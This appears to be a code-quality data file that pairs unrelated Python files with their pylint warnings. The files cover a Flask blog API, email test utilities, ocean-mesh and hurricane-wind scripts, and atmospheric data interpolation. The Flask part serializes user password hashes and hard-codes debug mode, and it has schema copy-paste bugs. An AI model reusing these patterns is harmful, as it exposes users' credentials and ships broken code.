10 fields = ("id", "post_id", "author_id", "title", "content", "publication_datetime")
11 model = Comment
12 ordered = True
13
14
15 class PostSchema(ma.Schema):
16 class Meta:
17 fields = ("id", "title", "content", "author_id", "publication_datetime", "comments")
18 model = Post
19 ordered = True
20
21 comments = ma.Nested(CommentSchema, many=True)
22
23
24 class UserSchema(ma.Schema):
25 class Meta:
26 fields = ("id", "username", "email", "password", "posts", "comments")
27 model = User
28 ordered = True
29
30 posts = ma.Nested(CommentSchema, many=True)
31 comments = ma.Nested(CommentSchema, many=True)
32
33
34 post_schema = PostSchema()
35 posts_schema = PostSchema(many=True)
36 comment_schema = PostSchema()
37 comments_schema = PostSchema(many=True)
38 user_schema = UserSchema()
39 users_schema = UserSchema(many=True) | 9 - refactor: too-few-public-methods
8 - refactor: too-few-public-methods
16 - refactor: too-few-public-methods
15 - refactor: too-few-public-methods
25 - refactor: too-few-public-methods
24 - refactor: too-few-public-methods
|
1 from config import Config
2 from flask import Flask
3 from flask_sqlalchemy import SQLAlchemy
4 from flask_migrate import Migrate
5
6
7 def create_app():
8 app = Flask(__name__)
9 app.config.from_object(Config)
10 app.debug = True
11
12 return app
13
14
15 app = create_app()
16 db = SQLAlchemy(app)
17 migrate = Migrate(app, db)
18
19
20 from app import api, models
21 db.create_all() | 8 - warning: redefined-outer-name
20 - warning: unused-import
20 - warning: unused-import
|
1 from datetime import datetime
2 from flask_bcrypt import generate_password_hash, check_password_hash
3
4 from app import db
5
6
7 class User(db.Model):
8 __tablename__ = 'users'
9 id = db.Column(db.Integer, primary_key=True, nullable=False)
10 username = db.Column(db.String(80), unique=True, nullable=False)
11 email = db.Column(db.String(120), unique=True, nullable=False)
12 password = db.Column(db.String(128), nullable=False)
13
14 posts = db.relationship('Post', backref='user', lazy='dynamic', cascade="all,delete")
15 comments = db.relationship('Comment', backref='user', lazy='dynamic', cascade="all,delete")
16
17 def hash_password(self):
18 self.password = generate_password_hash(self.password).decode('utf8')
19
20 def verify_password(self, password):
21 return check_password_hash(self.password, password)
22
23 def save(self):
24 db.session.add(self)
25 db.session.commit()
26
27 def __repr__(self):
28 return '<User %r>' % self.username
29
30
31 class Post(db.Model):
32 __tablename__ = 'posts'
33 id = db.Column(db.Integer, primary_key=True, nullable=False)
34 author_id = db.Column(db.Integer, db.ForeignKey(User.id), nullable=False)
35 title = db.Column(db.String(50), nullable=False)
36 content = db.Column(db.String(256), nullable=False)
37 publication_datetime = db.Column(db.DateTime(), default=datetime.now(), nullable=False)
38 comments = db.relationship('Comment', backref='post', lazy='dynamic', cascade="all,delete")
39
40 def __repr__(self):
41 return '<Post %s>' % self.title
42
43
44 class Comment(db.Model):
45 __tablename__ = 'comments'
46 id = db.Column(db.Integer, primary_key=True, nullable=False)
47 post_id = db.Column(db.Integer, db.ForeignKey(Post.id), nullable=False)
48 author_id = db.Column(db.Integer, db.ForeignKey(User.id), nullable=False)
49 title = db.Column(db.String(50), nullable=False)
50 content = db.Column(db.String(256), nullable=False)
51 publication_datetime = db.Column(db.DateTime(), default=datetime.now(), nullable=False)
52
53 def __repr__(self):
54 return '<Comment %s>' % self.title | 31 - refactor: too-few-public-methods
44 - refactor: too-few-public-methods
|
1 #!/usr/bin/env python
2
3 import difflib
4 import email.parser
5 import mailbox
6 import sys
7
8 f1, f2 = sys.argv[1:3]
9
10 expected = email.parser.Parser().parse(open(f1))
11
12 mbox = mailbox.mbox(f2, create=False)
13 msg = mbox[0]
14
15 diff = False
16
17 for h, val in expected.items():
18 if h not in msg:
19 print("Header missing: %r" % h)
20 diff = True
21 continue
22
23 if expected[h] == '*':
24 continue
25
26 if msg[h] != val:
27 print("Header %r differs: %r != %r" % (h, val, msg[h]))
28 diff = True
29
30
31 def flexible_eq(expected, got):
32 """Compare two strings, supporting wildcards.
33
34 This function compares two strings, but supports wildcards on the
35 expected string. The following characters have special meaning:
36
37 - ? matches any character.
38 - * matches anything until the end of the line.
39
40 Returns True if equal (considering wildcards), False otherwise.
41 """
42 posG = 0
43 for c in expected:
44 if posG >= len(got):
45 return False
46
47 if c == '?':
48 posG += 1
49 continue
50 if c == '*':
51 while got[posG] != '\n':
52 posG += 1
53 continue
54 continue
55
56 if c != got[posG]:
57 return False
58
59 posG += 1
60
61 return True
62
63
64 if not flexible_eq(expected.get_payload(), msg.get_payload()):
65 diff = True
66
67 if expected.is_multipart() != msg.is_multipart():
68 print("Multipart differs, expected %s, got %s" % (
69 expected.is_multipart(), msg.is_multipart()))
70 elif not msg.is_multipart():
71 exp = expected.get_payload().splitlines()
72 got = msg.get_payload().splitlines()
73 print("Payload differs:")
74 for l in difflib.ndiff(exp, got):
75 print(l)
76
77 sys.exit(0 if not diff else 1)
| 18 - warning: bad-indentation
19 - warning: bad-indentation
20 - warning: bad-indentation
21 - warning: bad-indentation
23 - warning: bad-indentation
24 - warning: bad-indentation
26 - warning: bad-indentation
27 - warning: bad-indentation
28 - warning: bad-indentation
65 - warning: bad-indentation
67 - warning: bad-indentation
68 - warning: bad-indentation
70 - warning: bad-indentation
71 - warning: bad-indentation
72 - warning: bad-indentation
73 - warning: bad-indentation
74 - warning: bad-indentation
75 - warning: bad-indentation
10 - refactor: consider-using-with
10 - warning: unspecified-encoding
31 - warning: redefined-outer-name
31 - warning: redefined-outer-name
|
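The wildcard rules in the flexible_eq docstring are easiest to see on small inputs. A restated sketch (with a bounds guard added to the '*' scan, which the original omits), plus example calls:

def flexible_eq(expected, got):
    # '?' matches any single character; '*' matches to the end of the line.
    pos = 0
    for c in expected:
        if pos >= len(got):
            return False
        if c == '?':
            pos += 1
            continue
        if c == '*':
            while pos < len(got) and got[pos] != '\n':
                pos += 1
            continue
        if c != got[pos]:
            return False
        pos += 1
    return True

print(flexible_eq("id: ?\n", "id: 7\n"))        # True: '?' matches '7'
print(flexible_eq("Date: *\n", "Date: Mon\n"))  # True: '*' eats the rest of the line
print(flexible_eq("abc", "abd"))                # False: literal mismatch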
1 #!/usr/bin/env python3
2 #
3 # Simple SMTP client for testing purposes.
4
5 import argparse
6 import email.parser
7 import email.policy
8 import smtplib
9 import sys
10
11 ap = argparse.ArgumentParser()
12 ap.add_argument("--server", help="SMTP server to connect to")
13 ap.add_argument("--user", help="Username to use in SMTP AUTH")
14 ap.add_argument("--password", help="Password to use in SMTP AUTH")
15 args = ap.parse_args()
16
17 # Parse the email using the "default" policy, which is not really the default.
18 # If unspecified, compat32 is used, which does not support UTF8.
19 msg = email.parser.Parser(policy=email.policy.default).parse(sys.stdin)
20
21 s = smtplib.SMTP(args.server)
22 s.starttls()
23 s.login(args.user, args.password)
24
25 # Note this does NOT support non-ascii message payloads transparently (headers
26 # are ok).
27 s.send_message(msg)
28 s.quit()
29
30
| Clean Code: No Issues Detected
|
1 import numpy as np
2 import matplotlib.pyplot as plt
3
4 def example():
5 x,y = np.linspace(-1,1,2), np.linspace(-1,1,2)
6 A, B = np.zeros((2,2)), np.zeros((2,2))
7 A[0,0]=1
8 B[0,0]=-1
9 A[0,1]=1
10 B[0,1]=1
11 A[1,0]=-1
12 B[1,0]=-1
13 A[1,1]=-1
14 B[1,1]=1
15
16 fig = plt.figure()
17 ax = fig.add_subplot(111)
18
19 # Plot the streamlines.
20 ax.streamplot(x,y,A,B)
21
22 ax.set_xlabel('$x$')
23 ax.set_ylabel('$y$')
24 ax.set_xlim(-2,2)
25 ax.set_ylim(-2,2)
26 ax.set_aspect('equal')
27 plt.show()
28
29 if __name__=='__main__':
30 example()
31
| Clean Code: No Issues Detected
|
1 #!/usr/bin/env python
2 '''
3 name: define_base_mesh
4 authors: Phillip J. Wolfram
5
6 This function specifies a high resolution patch for
7 Chris Jeffrey.
8
9 '''
10 import numpy as np
11
12 def cellWidthVsLatLon():
13 lat = np.arange(-90, 90.01, 1.0)
14 lon = np.arange(-180, 180.01, 2.0)
15
16 km = 1000.0
17 # in kms
18 baseRes = 120.0
19 highRes = 12.0
20 latC = 20.0
21 lonC = -155.0
22 rad = 10.0
23
24 theta = np.minimum(np.sqrt(((lat-latC)*(lat-latC))[:,np.newaxis] + ((lon-lonC)*(lon-lonC))[np.newaxis,:])/rad, 1.0)
25
26 cellWidth = (baseRes*theta + (1.0-theta)*highRes)*np.ones((lon.size,lat.size))
27
28 return cellWidth, lon, lat
| 16 - warning: unused-variable
|
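A quick check of the blend above: theta is 0 at the patch center, so cellWidth collapses to highRes there, and it saturates at baseRes beyond rad. Constants mirror the snippet:

import numpy as np

baseRes, highRes, latC, lonC, rad = 120.0, 12.0, 20.0, -155.0, 10.0

def blended_width(lat, lon):
    theta = min(np.sqrt((lat - latC) ** 2 + (lon - lonC) ** 2) / rad, 1.0)
    return baseRes * theta + (1.0 - theta) * highRes

print(blended_width(20.0, -155.0))  # 12.0 km at the patch center
print(blended_width(20.0, -150.0))  # 66.0 km halfway out
print(blended_width(45.0, -100.0))  # 120.0 km in the far field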
1 import numpy as np
2 import jigsaw_to_MPAS.mesh_definition_tools as mdt
3 from jigsaw_to_MPAS.coastal_tools import signed_distance_from_geojson, \
4 compute_cell_width
5 from geometric_features import read_feature_collection
6 import xarray
7
8 # Uncomment to plot the cell size distribution.
9 # import matplotlib
10 # matplotlib.use('Agg')
11 # import matplotlib.pyplot as plt
12
13
14 def cellWidthVsLatLon():
15 """
16 Create cell width array for this mesh on a regular latitude-longitude grid.
17 Returns
18 -------
19 cellWidth : numpy.ndarray
20 m x n array, entries are desired cell width in km
21 lat : numpy.ndarray
22 latitude, vector of length m, with entries between -90 and 90,
23 degrees
24 lon : numpy.ndarray
25 longitude, vector of length n, with entries between -180 and 180,
26 degrees
27 """
28 dlon = 0.1
29 dlat = dlon
30 nlon = int(360./dlon) + 1
31 nlat = int(180./dlat) + 1
32 lon = np.linspace(-180., 180., nlon)
33 lat = np.linspace(-90., 90., nlat)
34
35 cellWidthSouth = 30. * np.ones((len(lat)))
36
37 # Transition at Equator
38 cellWidthNorth = mdt.EC_CellWidthVsLat(lat)
39 latTransition = 0.0
40 latWidthTransition = 5.0
41 cellWidthVsLat = mdt.mergeCellWidthVsLat(
42 lat,
43 cellWidthSouth,
44 cellWidthNorth,
45 latTransition,
46 latWidthTransition)
47
48 _, cellWidth = np.meshgrid(lon, cellWidthVsLat)
49
50 # now, add the high-res region
51 fc = read_feature_collection('high_res_region.geojson')
52
53 signed_distance = signed_distance_from_geojson(fc, lon, lat,
54 max_length=0.25)
55
56 da = xarray.DataArray(signed_distance,
57 dims=['y', 'x'],
58 coords={'y': lat, 'x': lon},
59 name='signed_distance')
60 cw_filename = 'signed_distance.nc'
61 da.to_netcdf(cw_filename)
62
63 # multiply by 5 because transition_width gets multiplied by 0.2 in
64 # compute_cell_width
65 # Equivalent to 10 degrees latitude
66 trans_width = 5*1100e3
67 # The last term compensates for the offset in compute_cell_width.
68 # The middle of the transition is ~2.5 degrees (300 km) south of the
69 # region boundary to best match previous transition at 48 S. (The mean lat
70 # of the boundary is 45.5 S.)
71 trans_start = -300e3 - 0.5 * trans_width
72 dx_min = 10.
73
74 cellWidth = compute_cell_width(signed_distance, cellWidth, lon,
75 lat, dx_min, trans_start, trans_width,
76 restrict_box={'include': [], 'exclude': []})
77
78 # Uncomment to plot the cell size distribution.
79 # Lon, Lat = np.meshgrid(lon, lat)
80 # ax = plt.subplot(111)
81 # plt.pcolormesh(Lon, Lat, cellWidth)
82 # plt.colorbar()
83 # ax.set_aspect('equal')
84 # ax.autoscale(tight=True)
85 # plt.tight_layout()
86 # plt.savefig('cellWidthVsLat.png', dpi=200)
87
88 return cellWidth, lon, lat
| 14 - refactor: too-many-locals
|
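mergeCellWidthVsLat comes from jigsaw_to_MPAS and is not shown here; a plausible sketch of that kind of latitude blend is a tanh ramp of the given width centered on the transition latitude (the real helper may differ in detail):

import numpy as np

def merge_cell_width_vs_lat(lat, south, north, lat_transition, lat_width):
    # Weight ramps from 0 (take south) to 1 (take north) over ~lat_width degrees.
    w = 0.5 * (1.0 + np.tanh((lat - lat_transition) / lat_width))
    return (1.0 - w) * south + w * north

lat = np.linspace(-90.0, 90.0, 181)
widths = merge_cell_width_vs_lat(lat, 30.0 * np.ones(lat.size),
                                 60.0 * np.ones(lat.size), 0.0, 5.0)
print(widths[0], widths[90], widths[-1])  # ~30 south, 45 at the transition, ~60 north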
1 import numpy
2 from netCDF4 import Dataset
3 import matplotlib.pyplot as plt
4 import matplotlib
5 matplotlib.use('Agg')
6
7 fig = plt.gcf()
8 nRow = 6
9 nCol = 2
10 iTime = [8, 16]
11 nu = ['0.01', '0.1', '1', '10', '100', '200']
12 time = ['hour 8', 'hour 16']
13
14 fig, axs = plt.subplots(nRow, nCol, figsize=(
15 5.3 * nCol, 2.0 * nRow), constrained_layout=True)
16
17 for iRow in range(nRow):
18 ncfile = Dataset('output_' + str(iRow + 1) + '.nc', 'r')
19 var = ncfile.variables['temperature']
20 xtime = ncfile.variables['xtime']
21 for iCol in range(nCol):
22 ax = axs[iRow, iCol]
23 dis = ax.imshow(var[iTime[iCol], 0:512:4, :].T, extent=[
24 0, 120, 20, 0], aspect=2, cmap='jet', vmin=5, vmax=30)
25 if iRow == nRow - 1:
26 ax.set_xlabel('x, km')
27 if iCol == 0:
28 ax.set_ylabel('depth, m')
29 if iCol == nCol - 1:
30 fig.colorbar(dis, ax=axs[iRow, iCol], aspect=5)
31 ax.set_title(time[iCol] + ", " + r"$\nu_h=$" + nu[iRow])
32 ncfile.close()
33
34 plt.savefig('sections_lock_exchange.png', bbox_inches='tight')
| 1 - warning: unused-import
|
1 import math
2 from winds.wind_model import PROFILE_TYPE
3
4 class Parameters:
5 def __init__(self, mean_lat: float, wind_profile_type=PROFILE_TYPE.HOLLAND):
6 """
7 Constructor.
8 :param mean_lat: mean latitude of the hurricane trajectory to compute the Coriolis factor in radians
9 Units are km, hr, and millibars for distance, wind, and pressure respectively, and lat in decimal degrees.
10 """
11 self.siderealDay = 23.934 # A sidereal day in hrs.
12 self.omega = 2.0 * math.pi / self.siderealDay # The Earth's rotation rate in rad/hr.
13
14 self.rho = 1.15 # Air density at sea level in kg/m^3.
15 self.wind_profile_type = wind_profile_type # The particular wind profile model being used.
16
17 # Earth radius in km
18 self.earth_radius = 6371.1
19
20
21 def get_coriolis(self, lat: float) -> float:
22 """
23 Returns the Coriolis parameter for a given latitude.
24 :param lat: in radians
25 :return: coriolis factor in rad/s to be consistent with Holland's model units
26 """
27 # The Coriolis parameter = 2*omega*sin(|phi|)
28 # divide by 3600 to convert omega from rad/hr to rad/s
29 return 2.0 * self.omega / 3600. * math.sin(math.fabs(lat))
30
31
32 def get_pressure_unit(self):
33 return 'millibars'
34
35
36 def get_distance_unit(self):
37 return 'kilometers'
38
39
40 def get_time_unit(self):
41 return 'hours'
| 5 - warning: unused-argument
|
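The same Coriolis arithmetic as get_coriolis, written out standalone so the unit handling is visible (the class itself needs the winds package importable):

import math

omega = 2.0 * math.pi / 23.934                 # Earth's rotation rate in rad/hr
lat = math.radians(20.0)                       # latitude in radians
f = 2.0 * omega / 3600.0 * math.sin(abs(lat))  # rad/s, matching get_coriolis
print(f)                                       # ~4.99e-05 rad/s at 20 degrees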
1 #!/usr/bin/env python
2 '''
3 Script to map cell indices from MPASO noLI mesh to those of the wLI mesh in the runoff mapping file.
4 Start by building a runoff mapping file that has all the mesh description from wLI mapping file
5 but the actual mapping from the noLI mapping file:
6 ncks -x -v S,col,row /project/projectdirs/acme/inputdata/cpl/cpl6/map_rx1_to_oEC60to30v3wLI_smoothed.r300e600.170328.nc newfile.nc
7 ncks -A -v S,col,row /project/projectdirs/acme/inputdata/cpl/cpl6/map_rx1_to_oEC60to30v3_smoothed.r300e600.161222.nc newfile.nc
8 '''
9
10 # import modules # {{{
11 import netCDF4
12 import numpy as np
13 import argparse
14 import shutil
15 # }}}
16
17 # parser # {{{
18 parser = argparse.ArgumentParser()
19 parser.add_argument('-i', '--input_file', dest='input_file',
20 default='map_rx1_to_oEC60to30v3wLI.nc',
21 help='Input file, original runoff mapping file'
22 )
23 parser.add_argument('-o', '--output_file', dest='output_file',
24 default='map_rx1_to_oEC60to30v3wLI_final.nc',
25 help='Output file, revised runoff mapping file with no runoff below ice shelf cavities'
26 )
27 parser.add_argument('-l', '--lookup_table_file', dest='lookup_table_file',
28 default='lookup_table.txt',
29 help='lookup table file, only used locally'
30 )
31 parser.add_argument('-w', '--mesh_with_ISC', dest='mesh_with_ISC',
32 default='culled_mesh.nc',
33 help='mesh file, including ice shelf cavities'
34 )
35 parser.add_argument('-n', '--mesh_no_ISC', dest='mesh_no_ISC',
36 default='no_ISC_culled_mesh.nc',
37 help='mesh file, but without ice shelf cavities'
38 )
39
40
41 input_file = parser.parse_args().input_file
42 output_file = parser.parse_args().output_file
43 lookup_table_file = parser.parse_args().lookup_table_file
44 shutil.copy2(input_file, output_file)
45 # }}}
46
47 build_table = True
48 if build_table:
49 # noLI mesh
50 mesh_no_ISC = netCDF4.Dataset(parser.parse_args().mesh_no_ISC, 'r')
51 noLIxCell = mesh_no_ISC.variables['xCell'][:]
52 noLIyCell = mesh_no_ISC.variables['yCell'][:]
53 noLInCells = len(mesh_no_ISC.dimensions['nCells'])
54
55 # wLI mesh
56 mesh_with_ISC = netCDF4.Dataset(parser.parse_args().mesh_with_ISC, 'r')
57 wLIxCell = mesh_with_ISC.variables['xCell'][:]
58 wLIyCell = mesh_with_ISC.variables['yCell'][:]
59
60 # init lookup table
61 lookup = np.zeros((noLInCells,), dtype=np.uint32)
62
63 print("nCells=", noLInCells)
64 for i in range(noLInCells):
65 # for i in range(30):
66 if i % 1000 == 0:
67 print("Cell: ", i)
68 # find index of wLI mesh that is the same location as each cell in the
69 # noLI mesh
70 lookup[i] = np.argmin((noLIxCell[i] - wLIxCell[:])
71 ** 2 + (noLIyCell[i] - wLIyCell[:])**2)
72 mesh_no_ISC.close()
73 mesh_with_ISC.close()
74 print( "Lookup table complete.")
75 np.savetxt(lookup_table_file, lookup, fmt='%d')
76 print("Saved to ", lookup_table_file)
77 else:
78 lookup = np.loadtxt(lookup_table_file, dtype=np.uint32)
79 print("Loaded lookup table from:", lookup_table_file)
80
81 print("Lookup: first entries:", lookup[0:10])
82 print("Lookup: last entries:", lookup[-10:])
83
84 # now swap in wLI indices into the runoff mapping file
85 f = netCDF4.Dataset(output_file, "r+")
86 row = f.variables['row'][:]
87 rownew = row * 0
88 for i in range(len(row)):
89 rownew[i] = lookup[row[i] - 1] + 1 # 1-based
90 f.variables['row'][:] = rownew[:]
91 f.close()
92 print("Copied over indices.")
93
94 # vim: foldmethod=marker ai ts=4 sts=4 et sw=4 ft=python
| Clean Code: No Issues Detected
|
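The lookup table above is plain nearest-neighbor matching: for each noLI cell, np.argmin over squared distances picks the index of the closest wLI cell. On toy coordinates:

import numpy as np

noLIx = np.array([0.0, 10.0, 20.0])
noLIy = np.zeros(3)
wLIx = np.array([20.1, 0.2, 9.9, 50.0])  # same cells, shuffled, plus an extra
wLIy = np.zeros(4)

lookup = np.zeros(noLIx.size, dtype=np.uint32)
for i in range(noLIx.size):
    lookup[i] = np.argmin((noLIx[i] - wLIx) ** 2 + (noLIy[i] - wLIy) ** 2)
print(lookup)  # [1 2 0]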
1 import numpy as np
2 from structures.geogrid import GeoGrid
3 from profile_model.radialprofiles import HollandWindSpeedProfile
4 from winds.parameters import Parameters
5 from winds.velocities import Velocities
6 import matplotlib.pyplot as plt
7
8 def test_velocity_grid():
9 # Grid of x, y points
10 n = 50
11 nr = 200
12 rmax = 40
13 cmin, cmax = -200 , 200
14 cellsize = (cmax-cmin)/n
15 x = np.linspace(cmin, cmax, n)
16 y = np.linspace(cmin, cmax, n)
17 U = GeoGrid(cmin,cmin,n,n,cellsize)
18 V = GeoGrid(cmin,cmin,n,n,cellsize)
19
20 params = Parameters()
21 b = 1.4
22 hc = [0,0]
23 vf = [0,10]
24 deltap = 100
25 coriol = False
26 profile = HollandWindSpeedProfile(nr,2*cmax,rmax,deltap,params.rho,params.getCoriolisMid(),b,coriolis=coriol)
27 vels = Velocities(vf[0],vf[1],profile.getVmax())
28 for j in range(0,n):
29 for i in range(0,n):
30 pt = U.getCenter(i,j)
31 r = np.sqrt(pow(pt[0]-hc[0],2)+pow(pt[1]-hc[1],2))
32 vg = profile.getValue(r)
33 vv = vels.compute_wind_vector(vg,pt[0],pt[1])
34 U.put(i,j,vv[0])
35 V.put(i,j,vv[1])
36
37 assert True # If we made it to here.
38
39 fig = plt.figure()
40
41 ax = fig.add_subplot(131)
42 ax.plot(profile.rvals, profile.profile)
43
44 ax.set(xlabel='r (km)', ylabel='wind speed (km/hr)',
45 title='Radial Wind')
46 ax1 = fig.add_subplot(133)
47
48 # Plot the streamlines.
49 # Matplotlib assumes an ordinary row ordering, so the rows must be reversed before plotting.
50 Ug = U.grid
51 Vg = V.grid
52 Uplt = np.zeros([n,n])
53 Vplt = np.zeros([n,n])
54 for j in range(0,n):
55 jp = n-j-1
56 for i in range(0,n):
57 Uplt[jp,i]=Ug[j,i]
58 Vplt[jp,i]=Vg[j,i]
59
60 Vmag = np.sqrt(Ug*Ug+Vg*Vg)
61 ax1.streamplot(x, y, Uplt, Vplt, color=Vmag, cmap='Spectral')
62 ax1.set_xlabel('$x$')
63 ax1.set_ylabel('$y$')
64 ax1.set_xlim(cmin,cmax)
65 ax1.set_ylim(cmin,cmax)
66 ax1.set_aspect('equal')
67 plt.title('Wind Vectors')
68
69 plt.show()
70
| 8 - refactor: too-many-locals
|
1
2 def sign(x):
3 if(x>=0):
4 return 1
5 else:
6 return -1
7
| 3 - refactor: no-else-return
|
1 # Author: Steven Brus
2 # Date: August, 2019
3 # Description: Interpolates CFSR atmospheric reanalysis data onto the MPAS-O mesh and
4 # creates an input file to support time varying atmospheric forcing in the model
5
6 import netCDF4
7 import matplotlib.pyplot as plt
8 import numpy as np
9 import glob
10 import pprint
11 import datetime
12 import os
13 import yaml
14 import subprocess
15 import argparse
16 import cartopy
17 import cartopy.crs as ccrs
18 import cartopy.feature as cfeature
19 from scipy import interpolate
20 import write_forcing_file
21 plt.switch_backend('agg')
22 cartopy.config['pre_existing_data_dir'] = \
23 os.getenv('CARTOPY_DIR', cartopy.config.get('pre_existing_data_dir'))
24
25 ##################################################################################################
26 ##################################################################################################
27
28 def interpolate_data_to_grid(grid_file,data_file,var):
29
30 # Open files
31 data_nc = netCDF4.Dataset(data_file,'r')
32 grid_nc = netCDF4.Dataset(grid_file,'r')
33
34 # Get grid from data file
35 lon_data = data_nc.variables['lon'][:]
36 lon_data = np.append(lon_data,360.0)
37 lat_data = np.flipud(data_nc.variables['lat'][:])
38 time = data_nc.variables['time'][:]
39 nsnaps = time.size
40 nlon = lon_data.size
41 nlat = lat_data.size
42 data = np.zeros((nsnaps,nlat,nlon))
43 print(data.shape)
44
45 # Get grid from grid file
46 lon_grid = grid_nc.variables['lonCell'][:]*180.0/np.pi
47 lat_grid = grid_nc.variables['latCell'][:]*180.0/np.pi
48 grid_points = np.column_stack((lon_grid,lat_grid))
49 ncells = lon_grid.size
50 interp_data = np.zeros((nsnaps,ncells))
51 print(interp_data.shape)
52 print(np.amin(lon_grid),np.amax(lon_grid))
53 print(np.amin(lat_grid),np.amax(lat_grid))
54
55 # Interpolate timesnaps
56 for i,t in enumerate(time):
57 print('Interpolating '+var+': '+str(i))
58
59 # Get data to interpolate
60 data[i,:,0:-1] = np.flipud(data_nc.variables[var][i,:,:])
61 data[i,:,-1] = data[i,:,0]
62
63 # Interpolate data onto new grid
64 interpolator = interpolate.RegularGridInterpolator((lon_data,lat_data),data[i,:,:].T,bounds_error=False,fill_value=0.0)
65 interp_data[i,:] = interpolator(grid_points)
66
67 # Convert the time coordinate into xtime date strings
68 ref_date = data_nc.variables['time'].getncattr('units').replace('hours since ','').replace('.0 +0:00','')
69 ref_date = datetime.datetime.strptime(ref_date,'%Y-%m-%d %H:%M:%S')
70 xtime = []
71 for t in time:
72 date = ref_date + datetime.timedelta(hours=np.float64(t))
73 xtime.append(date.strftime('%Y-%m-%d_%H:%M:%S'+45*' '))
74 xtime = np.array(xtime,'S64')
75
76 return lon_grid,lat_grid,interp_data,lon_data,lat_data,data,xtime
77
78 ##################################################################################################
79 ##################################################################################################
80
81 def plot_interp_data(lon_data,lat_data,data,lon_grid,lat_grid,interp_data,var_label,var_abrev,time):
82
83
84 # Plot data
85 fig = plt.figure()
86 levels = np.linspace(np.amin(data),np.amax(data),100)
87 ax0 = fig.add_subplot(2, 1, 1, projection=ccrs.PlateCarree())
88 cf = ax0.contourf(lon_data, lat_data, data, levels=levels,
89 transform=ccrs.PlateCarree())
90 ax0.set_extent([0, 359.9, -90, 90], crs=ccrs.PlateCarree())
91 ax0.add_feature(cfeature.LAND, zorder=100)
92 ax0.add_feature(cfeature.LAKES, alpha=0.5, zorder=101)
93 ax0.add_feature(cfeature.COASTLINE, zorder=101)
94 ax0.set_title('data '+time.strip().decode())
95 cbar = fig.colorbar(cf,ax=ax0)
96 cbar.set_label(var_label)
97
98 # Plot interpolated data
99 ax1 = fig.add_subplot(2, 1, 2, projection=ccrs.PlateCarree())
100 levels = np.linspace(np.amin(interp_data),np.amax(interp_data),100)
101 cf = ax1.tricontourf(lon_grid,lat_grid,interp_data,levels=levels,
102 transform=ccrs.PlateCarree())
103 ax1.set_extent([0, 359.9, -90, 90], crs=ccrs.PlateCarree())
104 ax1.add_feature(cfeature.LAND, zorder=100)
105 ax1.add_feature(cfeature.LAKES, alpha=0.5, zorder=101)
106 ax1.add_feature(cfeature.COASTLINE, zorder=101)
107 ax1.set_title('interpolated data '+time.strip().decode())
108 cbar = fig.colorbar(cf,ax=ax1)
109 cbar.set_label(var_label)
110
111 # Save figure
112 fig.tight_layout()
113 fig.savefig(var_abrev+'_'+str(i).zfill(4)+'.png',box_inches='tight')
114 plt.close()
115
116 ##################################################################################################
117 ##################################################################################################
118
119 if __name__ == '__main__':
120
121 parser = argparse.ArgumentParser()
122 parser.add_argument('--plot',action='store_true')
123 args = parser.parse_args()
124
125 nplot = 10
126
127 # Files to interpolate to/from
128 grid_file = './mesh.nc'
129 wind_file = './wnd10m.nc'
130 pres_file = './prmsl.nc'
131 forcing_file = 'atmospheric_forcing.nc'
132
133 # Interpolation of u and v velocities
134 lon_grid,lat_grid,u_interp,lon_data,lat_data,u_data,xtime = interpolate_data_to_grid(grid_file,wind_file,'U_GRD_L103')
135 lon_grid,lat_grid,v_interp,lon_data,lat_data,v_data,xtime = interpolate_data_to_grid(grid_file,wind_file,'V_GRD_L103')
136
137 # Calculate and plot velocity magnitude
138 if args.plot:
139 for i in range(u_data.shape[0]):
140 if i % nplot == 0:
141
142 print('Plotting vel: '+str(i))
143
144 data = np.sqrt(np.square(u_data[i,:,:]) + np.square(v_data[i,:,:]))
145 interp_data = np.sqrt(np.square(u_interp[i,:]) + np.square(v_interp[i,:]))
146
147 plot_interp_data(lon_data,lat_data,data,lon_grid,lat_grid,interp_data,'velocity magnitude','vel',xtime[i])
148
149 # Interpolation of atmospheric pressure
150 lon_grid,lat_grid,p_interp,lon_data,lat_data,p_data,xtime = interpolate_data_to_grid(grid_file,pres_file,'PRMSL_L101')
151
152 # Plot atmospheric pressure
153 if args.plot:
154 for i in range(p_data.shape[0]):
155 if i % nplot == 0:
156
157 print('Plotting pres: '+str(i))
158
159 plot_interp_data(lon_data,lat_data,p_data[i,:,:],lon_grid,lat_grid,p_interp[i,:],'atmospheric pressure','pres',xtime[i])
160
161 # Write to NetCDF file
162 subprocess.call(['rm',forcing_file])
163 write_forcing_file.write_to_file(forcing_file,u_interp,'windSpeedU',xtime)
164 write_forcing_file.write_to_file(forcing_file,v_interp,'windSpeedV',xtime)
165 write_forcing_file.write_to_file(forcing_file,p_interp,'atmosPressure',xtime)
166
| 31 - warning: bad-indentation
32 - warning: bad-indentation
35 - warning: bad-indentation
36 - warning: bad-indentation
37 - warning: bad-indentation
38 - warning: bad-indentation
39 - warning: bad-indentation
40 - warning: bad-indentation
41 - warning: bad-indentation
42 - warning: bad-indentation
43 - warning: bad-indentation
46 - warning: bad-indentation
47 - warning: bad-indentation
48 - warning: bad-indentation
49 - warning: bad-indentation
50 - warning: bad-indentation
51 - warning: bad-indentation
52 - warning: bad-indentation
53 - warning: bad-indentation
56 - warning: bad-indentation
57 - warning: bad-indentation
60 - warning: bad-indentation
61 - warning: bad-indentation
64 - warning: bad-indentation
65 - warning: bad-indentation
68 - warning: bad-indentation
69 - warning: bad-indentation
70 - warning: bad-indentation
71 - warning: bad-indentation
72 - warning: bad-indentation
73 - warning: bad-indentation
74 - warning: bad-indentation
76 - warning: bad-indentation
85 - warning: bad-indentation
86 - warning: bad-indentation
87 - warning: bad-indentation
88 - warning: bad-indentation
90 - warning: bad-indentation
91 - warning: bad-indentation
92 - warning: bad-indentation
93 - warning: bad-indentation
94 - warning: bad-indentation
95 - warning: bad-indentation
96 - warning: bad-indentation
99 - warning: bad-indentation
100 - warning: bad-indentation
101 - warning: bad-indentation
103 - warning: bad-indentation
104 - warning: bad-indentation
105 - warning: bad-indentation
106 - warning: bad-indentation
107 - warning: bad-indentation
108 - warning: bad-indentation
109 - warning: bad-indentation
112 - warning: bad-indentation
113 - warning: bad-indentation
114 - warning: bad-indentation
121 - warning: bad-indentation
122 - warning: bad-indentation
123 - warning: bad-indentation
125 - warning: bad-indentation
128 - warning: bad-indentation
129 - warning: bad-indentation
130 - warning: bad-indentation
131 - warning: bad-indentation
134 - warning: bad-indentation
135 - warning: bad-indentation
138 - warning: bad-indentation
139 - warning: bad-indentation
140 - warning: bad-indentation
142 - warning: bad-indentation
144 - warning: bad-indentation
145 - warning: bad-indentation
147 - warning: bad-indentation
150 - warning: bad-indentation
153 - warning: bad-indentation
154 - warning: bad-indentation
